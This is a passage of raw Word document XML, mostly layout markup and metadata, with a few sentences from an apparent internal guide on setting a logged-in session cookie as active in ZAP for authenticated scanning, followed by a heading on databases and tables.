                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1093304" cy="1152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A42A80">
              <v:rect id="Rectangle 78" style="position:absolute;margin-left:220.7pt;margin-top:46pt;width:86.1pt;height:9.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68FB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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00317F51" w:rsidRPr="00317F51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="155838AD" wp14:editId="4237282C">
            <wp:extent cx="5943600" cy="832485"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId176"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="832485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AE1674" w14:textId="77777777" w:rsidR="0073134B" w:rsidRDefault="0073134B" w:rsidP="0003386B"/>
    <w:p w14:paraId="5348589F" w14:textId="355C4419" w:rsidR="0073134B" w:rsidRDefault="0073134B" w:rsidP="0003386B">
      <w:r>
        <w:t>Login to the web application using valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9FBEEE" w14:textId="303BDB70" w:rsidR="00317F51" w:rsidRDefault="00317F51" w:rsidP="005E2537">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00317F51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="035E1462" wp14:editId="28A798F7">
            <wp:extent cx="4435434" cy="2684480"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="229" name="Picture 2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chat or text message&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId177"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4439056" cy="2686672"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C37AAE1" w14:textId="77777777" w:rsidR="00D22353" w:rsidRDefault="00D22353" w:rsidP="00137FD3"/>
    <w:p w14:paraId="77C10AB4" w14:textId="252224F5" w:rsidR="00070730" w:rsidRDefault="00070730" w:rsidP="00137FD3">
      <w:r>
        <w:t xml:space="preserve">The session cookie should appear under the HTTP Sessions tab. If it does not show, </w:t>
      </w:r>
      <w:r w:rsidR="00D47191">
        <w:t>log out</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and log back in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE9258" w14:textId="661C6293" w:rsidR="00317F51" w:rsidRDefault="007C094F" w:rsidP="0003386B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658266" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69FE995C" wp14:editId="4C999552">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1132114</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>313870</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3264010" cy="109583"/>
                <wp:effectExtent l="0" t="0" r="12700" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="79" name="Rectangle 79"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3264010" cy="1095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9C98DC">
              <v:rect id="Rectangle 79" style="position:absolute;margin-left:89.15pt;margin-top:24.7pt;width:257pt;height:8.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8AA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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00317F51" w:rsidRPr="00317F51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6206EF6A" wp14:editId="640B4774">
            <wp:extent cx="5943600" cy="590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90550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AED148" w14:textId="77777777" w:rsidR="00070730" w:rsidRDefault="00070730" w:rsidP="0003386B"/>
    <w:p w14:paraId="75DC3F35" w14:textId="77777777" w:rsidR="00D22353" w:rsidRDefault="00D22353">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39647789" w14:textId="7975171A" w:rsidR="00070730" w:rsidRDefault="00070730" w:rsidP="00137FD3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Right</w:t>
      </w:r>
      <w:r w:rsidR="00D47191">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">click on the </w:t>
      </w:r>
      <w:r w:rsidR="00320BD3">
        <w:t xml:space="preserve">session cookie and select “Set as Active”. At this point, ZAP would make all </w:t>
      </w:r>
      <w:r w:rsidR="1745D864">
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidR="00320BD3">
        <w:t xml:space="preserve"> using this session </w:t>
      </w:r>
      <w:r w:rsidR="00375457">
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00320BD3">
        <w:t xml:space="preserve"> to perform scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15278213" w14:textId="3F5A69AC" w:rsidR="006A18EE" w:rsidRDefault="007C094F" w:rsidP="0003386B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658267" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A94C627" wp14:editId="29267D63">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2277174</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>436750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1458097" cy="127098"/>
                <wp:effectExtent l="0" t="0" r="27940" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="80" name="Rectangle 80"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1458097" cy="1270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319341">
              <v:rect id="Rectangle 80" style="position:absolute;margin-left:179.3pt;margin-top:34.4pt;width:114.8pt;height:1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F4BA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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006A18EE" w:rsidRPr="006A18EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BBFCF76" wp14:editId="7A2B955C">
            <wp:extent cx="5943600" cy="977900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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ic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId179"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="977900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB5B00" w14:textId="77777777" w:rsidR="00320BD3" w:rsidRDefault="00320BD3" w:rsidP="0003386B"/>
    <w:p w14:paraId="26651C20" w14:textId="66E23B77" w:rsidR="008730D4" w:rsidRDefault="008730D4" w:rsidP="0003386B"/>
    <w:p w14:paraId="351537D0" w14:textId="472F27C2" w:rsidR="008730D4" w:rsidRDefault="008730D4" w:rsidP="0003386B"/>
    <w:p w14:paraId="19C12C03" w14:textId="1741EAAE" w:rsidR="00657C60" w:rsidRDefault="00657C60">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5876194C" w14:textId="1828425B" w:rsidR="00657C60" w:rsidRDefault="00657C60" w:rsidP="005F0B7D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="_Database_and_Tables"/>
      <w:bookmarkStart w:id="202" w:name="_Toc94100271"/>
      <w:bookmarkEnd w:id="201"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Database</w:t>
      </w:r>
      <w:r w:rsidR="001D19C0">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Tables</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
    </w:p>
    <w:p w14:paraId="4059C91D" w14:textId="52C188F5" w:rsidR="00657C60" w:rsidRDefault="00657C60" w:rsidP="00657C60">
      <w:r>
        <w:t xml:space="preserve">The diagram below depicts the high-level view of the databases and </w:t>
      </w:r>
      <w:r w:rsidR="14B28EC5">
        <w:t>their</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F852C0F" w14:textId="77777777" w:rsidR="00657C60" w:rsidRPr="00294107" w:rsidRDefault="00657C60" w:rsidP="00657C60">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F82313" wp14:editId="446671C2">
            <wp:extent cx="3146961" cy="511115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82162" cy="5168329"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D4E4C9" w14:textId="77777777" w:rsidR="008730D4" w:rsidRPr="0003386B" w:rsidRDefault="008730D4" w:rsidP="0003386B"/>
    <w:sectPr w:rsidR="008730D4" w:rsidRPr="0003386B" w:rsidSect="0019315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7260" w14:textId="77777777" w:rsidR="00FE67AF" w:rsidRDefault="00FE67AF" w:rsidP="009F40D8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="53E70B85" w14:textId="77777777" w:rsidR="00FE67AF" w:rsidRDefault="00FE67AF" w:rsidP="009F40D8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="7FC9F1D1" w14:textId="77777777" w:rsidR="00FE67AF" w:rsidRDefault="00FE6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8628" w14:textId="77777777" w:rsidR="00651159" w:rsidRDefault="00651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094472"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7CBD2F2D" w14:textId="096086C5" w:rsidR="009F40D8" w:rsidRDefault="009F40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1AAFA1" w14:textId="77777777" w:rsidR="009F40D8" w:rsidRDefault="009F4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686B" w14:textId="77777777" w:rsidR="00651159" w:rsidRDefault="00651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4295" w14:textId="77777777" w:rsidR="00FE67AF" w:rsidRDefault="00FE67AF" w:rsidP="009F40D8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03701740" w14:textId="77777777" w:rsidR="00FE67AF" w:rsidRDefault="00FE67AF" w:rsidP="009F40D8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="5ECA5BC6" w14:textId="77777777" w:rsidR="00FE67AF" w:rsidRDefault="00FE6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CBA6" w14:textId="00BE089D" w:rsidR="00651159" w:rsidRDefault="00651159">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="155D1D92" wp14:editId="51DA83A5">
              <wp:simplePos x="635" y="635"/>
              <wp:positionH relativeFrom="leftMargin">
                <wp:align>left</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="443865" cy="443865"/>
              <wp:effectExtent l="0" t="0" r="12065" b="4445"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="18946406" name="Text Box 18946406"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ACEED" w14:textId="4DE12879" w:rsidR="00651159" w:rsidRPr="00651159" w:rsidRDefault="00651159">
                          <w:pPr>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="000000"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00651159">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5D1D92" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 18946406" o:spid="_x0000_s1026" type="#_x0000_t202" alt="                    Official Open"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41FACEED" w14:textId="4DE12879" w:rsidR="00651159" w:rsidRPr="00651159" w:rsidRDefault="00651159">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="000000"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00651159">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CC4F" w14:textId="625AD043" w:rsidR="00651159" w:rsidRDefault="00651159">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50F48E2E" wp14:editId="1CE0DC00">
              <wp:simplePos x="635" y="635"/>
              <wp:positionH relativeFrom="leftMargin">
                <wp:align>left</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="443865" cy="443865"/>
              <wp:effectExtent l="0" t="0" r="12065" b="4445"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="18946410" name="Text Box 18946410"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1226DC" w14:textId="7B69975E" w:rsidR="00651159" w:rsidRPr="00651159" w:rsidRDefault="00651159">
                          <w:pPr>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="000000"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00651159">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F48E2E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 18946410" o:spid="_x0000_s1027" type="#_x0000_t202" alt="                    Official Open"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481226DC" w14:textId="7B69975E" w:rsidR="00651159" w:rsidRPr="00651159" w:rsidRDefault="00651159">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="000000"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00651159">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1641" w14:textId="5E03522C" w:rsidR="00651159" w:rsidRDefault="00651159">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="407439BA" wp14:editId="3620F9F7">
              <wp:simplePos x="635" y="635"/>
              <wp:positionH relativeFrom="leftMargin">
                <wp:align>left</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>635</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="443865" cy="443865"/>
              <wp:effectExtent l="0" t="0" r="12065" b="4445"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="30" name="Text Box 30"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F790B" w14:textId="75937CA0" w:rsidR="00651159" w:rsidRPr="00651159" w:rsidRDefault="00651159">
                          <w:pPr>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="000000"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00651159">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7439BA" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 30" o:spid="_x0000_s1028" type="#_x0000_t202" alt="                    Official Open"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3DBF790B" w14:textId="75937CA0" w:rsidR="00651159" w:rsidRPr="00651159" w:rsidRDefault="00651159">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="000000"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00651159">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="000000"/>
                      </w:rPr>
                      <w:t xml:space="preserve">                    Official Open</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="square" anchorx="margin"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
</w:hdr>
</file>

<file path=word/intelligence.xml><?xml version="1.0" encoding="utf-8"?>
<int:Intelligence xmlns:int="http://schemas.microsoft.com/office/intelligence/2019/intelligence">
  <int:IntelligenceSettings/>
  <int:Manifest>
    <int:ParagraphRange paragraphId="337243122" textId="2118172985" start="90" length="13" invalidationStart="90" invalidationLength="13" id="evb73m0h"/>
    <int:ParagraphRange paragraphId="1558845406" textId="113852426" start="172" length="15" invalidationStart="172" invalidationLength="15" id="XDuEEZta"/>
    <int:ParagraphRange paragraphId="870464617" textId="804578185" start="132" length="6" invalidationStart="132" invalidationLength="6" id="1HcWt0kH"/>
    <int:ParagraphRange paragraphId="195561896" textId="528852863" start="208" length="15" invalidationStart="208" invalidationLength="15" id="m6IsMCz7"/>
    <int:ParagraphRange paragraphId="1027615971" textId="1422505616" start="184" length="5" invalidationStart="184" invalidationLength="5" id="gV6hjeSP"/>
    <int:ParagraphRange paragraphId="505738792" textId="604307022" start="117" length="4" invalidationStart="117" invalidationLength="4" id="Dip9HRCD"/>
    <int:ParagraphRange paragraphId="245330422" textId="660533047" start="46" length="9" invalidationStart="46" invalidationLength="9" id="sb8BHEtJ"/>
    <int:ParagraphRange paragraphId="803469264" textId="1895070990" start="58" length="3" invalidationStart="58" invalidationLength="3" id="KIxuep2S"/>
    <int:ParagraphRange paragraphId="439574508" textId="1915837118" start="428" length="4" invalidationStart="428" invalidationLength="4" id="9dhnPtDI"/>
    <int:ParagraphRange paragraphId="1277411155" textId="933357163" start="0" length="9" invalidationStart="0" invalidationLength="9" id="9fgXm9h6"/>
    <int:ParagraphRange paragraphId="1524554502" textId="1037941344" start="19" length="9" invalidationStart="19" invalidationLength="9" id="2cNLyOcA"/>
    <int:ParagraphRange paragraphId="1105459692" textId="1397049415" start="48" length="9" invalidationStart="48" invalidationLength="9" id="aCC9Jsr9"/>
    <int:ParagraphRange paragraphId="488767165" textId="1627264644" start="109" length="3" invalidationStart="109" invalidationLength="3" id="WbLAeV2S"/>
    <int:ParagraphRange paragraphId="1277411155" textId="2016273170" start="248" length="4" invalidationStart="248" invalidationLength="4" id="zFt9I7Ta"/>
    <int:ParagraphRange paragraphId="859288660" textId="2004318071" start="86" length="8" invalidationStart="86" invalidationLength="8" id="9iL7h8b4"/>
    <int:ParagraphRange paragraphId="1019272180" textId="1065220006" start="18" length="3" invalidationStart="18" invalidationLength="3" id="LU5SyYZM"/>
    <int:WordHash hashCode="F/VfddFbpG1qH3" id="UfBWKCRt"/>
    <int:WordHash hashCode="t0RQOKsFHh6bu+" id="WuOhVK2n"/>
    <int:WordHash hashCode="+Eyccfglmli3vr" id="QdksjOwt"/>
    <int:WordHash hashCode="IlJEOddqvhlR9O" id="okb5SNPR"/>
    <int:WordHash hashCode="0Eh5JItp2zjrEd" id="Otx33ULn"/>
    <int:WordHash hashCode="vN30lFIGO6/cwf" id="EkbiIgtR"/>
    <int:WordHash hashCode="uYom+Iayd0ZExP" id="15Ad34bN"/>
    <int:WordHash hashCode="XzrPvrT2+lAH3R" id="oRirKn2A"/>
    <int:WordHash hashCode="fd+YjIOIEqQxgz" id="OVXcmc3P"/>
    <int:WordHash hashCode="txwAGha+uyPT2v" id="ZNnPjZba"/>
    <int:WordHash hashCode="Der8lA472y5jhV" id="iwp8vYFA"/>
    <int:WordHash hashCode="EyOmJj7els8afK" id="bpoJnXTe"/>
    <int:WordHash hashCode="AQwYIMwx7ASaVu" id="cp5HNTSN"/>
    <int:WordHash hashCode="Kcwip5+5w2Q3E4" id="kL6a5JyD"/>
    <int:WordHash hashCode="vXhIMiRX/2h8GF" id="3hvn1uAX"/>
    <int:WordHash hashCode="7g/+QsHxoB5yty" id="6FsiCRQ3"/>
    <int:WordHash hashCode="vEl5QuU7kcKTVj" id="HqMW7mcY"/>
    <int:WordHash hashCode="cCbPmTa1xbl03F" id="QLOkJmfG"/>
    <int:WordHash hashCode="8YkiJHmae4a/8w" id="ru8HbOiB"/>
    <int:WordHash hashCode="oyNylr3p2WZ1C/" id="2TE4poG9"/>
    <int:WordHash hashCode="Dt513MyULIQ6hX" id="TLplg5vR"/>
    <int:WordHash hashCode="zTsOichpYtEkA2" id="czgMCx0n"/>
    <int:WordHash hashCode="uJ6qx+YUFzQbcQ" id="hb9OzA3r"/>
    <int:WordHash hashCode="kECn1s33oNbKsY" id="O0osAgAB"/>
    <int:WordHash hashCode="WkXL9V8CueYle3" id="eq0b3xxO"/>
    <int:WordHash hashCode="gJgOgQPIDkuAti" id="dqyIXp98"/>
    <int:WordHash hashCode="HHDnJuJFUKWiMx" id="iYgarCmz"/>
    <int:WordHash hashCode="zsU3nq+5EZWcMB" id="7WJtODb8"/>
    <int:WordHash hashCode="/nWV+j4hcXpt3B" id="TADcPGcP"/>
    <int:WordHash hashCode="CPXtJgGE86cq/2" id="kD7KJDFZ"/>
    <int:WordHash hashCode="b3wF8n03DiQV9s" id="0DoRJrfM"/>
    <int:WordHash hashCode="OsodgwdgAzl5rA" id="wWFlYZ56"/>
    <int:WordHash hashCode="zGV/24UpZWt3Qk" id="V0jBiJJ5"/>
    <int:WordHash hashCode="qToWeuPDB8JmRq" id="M6kL6xa1"/>
    <int:WordHash hashCode="ng7U8AzBjIc3Gs" id="3w0NWBug"/>
    <int:WordHash hashCode="MwqMqoBtm/HSdr" id="hukkFD6w"/>
    <int:WordHash hashCode="DjC711vDZ+wg05" id="e0HxJwqv"/>
    <int:WordHash hashCode="G1e77J40hNZnjB" id="kpq03Wo4"/>
    <int:WordHash hashCode="dfBuRAJYs1Q5ii" id="cUHYmqcY"/>
    <int:WordHash hashCode="TDCkBijr0Y0JzO" id="iwFUaAQq"/>
    <int:WordHash hashCode="CmGQ35Z13jwYsS" id="dkxbEcLF"/>
    <int:WordHash hashCode="5QUjBHB9XRo9ej" id="j8Jw1c5Z"/>
    <int:WordHash hashCode="g2xibVLz+y6lQ6" id="hQZ2qisc"/>
    <int:WordHash hashCode="KiLbyLHjVszoky" id="0J0mGPFC"/>
    <int:WordHash hashCode="bxTC4ux87e9VRN" id="kKTYWteW"/>
    <int:WordHash hashCode="/vl7rpBYpb7qz8" id="3qbabBni"/>
    <int:WordHash hashCode="GYNa9gT62nXldw" id="VDBkNLCb"/>
    <int:WordHash hashCode="x3YkCXkvRdWDie" id="7WCOSTB4"/>
  </int:Manifest>
  <int:Observations>
    <int:Content id="evb73m0h">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="XDuEEZta">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="1HcWt0kH">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="m6IsMCz7">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="gV6hjeSP">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="Dip9HRCD">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="sb8BHEtJ">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="KIxuep2S">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="9dhnPtDI">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="9fgXm9h6">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="2cNLyOcA">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="aCC9Jsr9">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="WbLAeV2S">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="zFt9I7Ta">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="9iL7h8b4">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="LU5SyYZM">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="UfBWKCRt">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="WuOhVK2n">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="QdksjOwt">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="okb5SNPR">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="Otx33ULn">
